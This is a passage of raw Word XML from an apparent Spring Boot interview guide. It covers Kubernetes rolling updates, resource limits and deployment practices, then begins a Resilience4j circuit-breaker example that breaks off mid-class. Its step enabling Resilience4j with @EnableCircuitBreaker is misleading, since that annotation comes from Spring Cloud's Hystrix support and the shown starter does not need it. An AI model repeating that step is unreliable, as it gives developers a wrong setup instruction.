    <w:p w14:paraId="49BF1533"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 rolling update:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D2E4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2305311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1938E3E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368CA0C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4C0126D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633D096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trategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379ED72A"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type: RollingUpdate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B12DD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ollingUpdate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F377050"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Surge: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDC682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axUnavailable: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E95929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10. Scaling and Resource Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B266C1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n Kubernetes, define </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource limit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requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for CPU and memory to manage the resource consumption of your Spring Boot microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0CE2FA"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C752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apiVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD714F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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224BF94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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A6354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name: my-app-deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5729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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D9665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plicas: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38D85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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1A58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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC71C67"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ontainers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149993C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 name: my-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C62229"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image: my-app:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661970E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sources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790E6C31"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requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39599F2B"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mory: "512Mi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C08C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pu: "500m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2029205F"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limits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CB95D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memory: "1Gi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713FE47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              cpu: "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2DA6FE" w14:textId="77777777" w:rsidR="00D11433" w:rsidRPr="00D11433" w:rsidRDefault="00D11433" w:rsidP="00D11433">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616C236E"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To orchestrate and deploy </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple Spring Boot microservices in Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the following steps are key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9825E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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Containerize</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each Spring Boot microservice using Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F2DAD2"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Create </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes Deployment</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rvice</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> resources for each microservice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C1843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se </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConfigMap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Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for environment-specific configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F99788"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Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Horizontal Pod Autoscaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle dynamic traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3711AC"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Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>centralized logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ELK/Fluentd) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Prometheus/Grafana).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DADE873"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Set up </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CI/CD pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for automated deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BB4C16"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Utilize </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Istio</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Linkerd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for service mesh and traffic management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362A655"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Leverage </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rolling updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rollback</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for zero-downtime deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A93E984"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 xml:space="preserve">Define </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource requests and limits</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage microservices' resource consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5772303D" w14:textId="77777777" w:rsidR="00D11433" w:rsidRPr="00D11433" w:rsidRDefault="00D11433" w:rsidP="00D11433">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By following these practices, you ensure a scalable, fault-tolerant, and manageable microservices architecture in production with Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EA71A0" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00000000" w:rsidP="00187C12">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="10C14DBC">
          <v:rect id="_x0000_i2900" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D15CE62" w14:textId="7AD8DA0C" w:rsidR="00187C12" w:rsidRPr="00CE4B95" w:rsidRDefault="005452DC" w:rsidP="002F6236">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="702" w:name="_Toc197867916"/>
      <w:r w:rsidRPr="005452DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">How do you implement the Circuit breaker pattern (example resilience4j / hystrix) in Spring </w:t>
      </w:r>
      <w:r w:rsidR="002F6236">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005452DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Boot microservices where application to handle the failures in the downstream systems</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="702"/>
    </w:p>
    <w:p w14:paraId="0967293E" w14:textId="1F34A009" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="001E1252">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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mplementing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Circuit Breaker pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot microservices helps handle failures gracefully in downstream systems and provides resilience by preventing your service from making unnecessary calls to a failing system. This is especially useful when dealing with remote services or APIs that could fail due to high latency or other issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5F03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You can use libraries like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xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hystrix</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to implement the Circuit Breaker pattern in Spring Boot. I'll provide an example using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as it is the more modern and preferred approach with Spring Boot 2.x+.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FC31E9"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Steps to Implement Circuit Breaker in Spring Boot Using Resilience4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1394A2"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1. Add Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7939CE4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n your pom.xml, include the necessary dependencies for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 xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ABB2A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ies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF11B9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5EBD2E4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io.github.resilience4j&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA618C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resilience4j-spring-boot2&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7110D40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version&gt;1.7.0&lt;/version&gt; &lt;!-- Use the latest version --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA396B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77D9D9E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7B892A3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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58255BE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spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C441B6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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC919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ies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C93C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f you're using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Gradle</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A27">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the equivalent dependencies would look like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E19FFA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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36727D2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mplementation 'io.github.resilience4j:resilience4j-spring-boot2:1.7.0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6138B4F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mplementation 'org.springframework.boot:spring-boot-starter-web'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578403A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7E8C40C1"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2. Enable Resilience4j in Your Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D235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lastRenderedPageBreak/>
        <w:t>In your Spring Boot application class or any configuration class, enable Resilience4j with @EnableCircuitBreaker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586100B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boot.SpringApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C64627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boot.autoconfigure.SpringBootApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522232B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EnableCircuitBreaker;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05016FC1" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2328F29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pringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EF5C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nableCircuitBreaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD806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MyApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F4F0A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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BFFCD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pringApplication.run(MyApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2453D8B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FACB93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60498429"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3. Configure Circuit Breaker Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F60004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configure the circuit breaker settings in your application.properties or application.yml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F8309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resilience4j.circuitbreaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6BCCC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nstances:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9B6DD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myServiceCircuitBreaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD1CE0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gisterHealthIndicator: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD91B2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failureRateThreshold: 50   # Percentage of failures before opening the circuit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F2E39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aitDurationInOpenState: 10000ms   # Time the circuit remains open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3211AB1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ermittedNumberOfCallsInHalfOpenState: 3  # Calls allowed when circuit is half-open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADE452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lidingWindowSize: 10    # Number of recent calls to consider for failure rate calculation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1016A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slidingWindowType: COUNT_BASED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4040E52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minimumNumberOfCalls: 5  # Minimum number of calls required to evaluate failure rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A3A15F"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4. Use Circuit Breaker in Your Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647286B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Now, you can apply the circuit breaker in your service layer. Here, you define which methods should be protected by the circuit breaker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A5EB3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xample service using Resilience4j's @CircuitBreaker annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303DC90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CircuitBreaker;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D557A1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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6339A3D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web.client.RestTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354E4C23" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17CBB1E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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C75E1C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MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5163AC31" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D1BB6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rivate final RestTemplate restTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44102674" w14:textId="77777777" w:rsidR="00C76A27" w:rsidRPr="00C76A27" w:rsidRDefault="00C76A27" w:rsidP="00C76A27">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA012A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MyService(RestTemplate restTemplate) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F924D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this.restTemplate = restTemplate;</w:t>
      </w:r>
    </w:p>
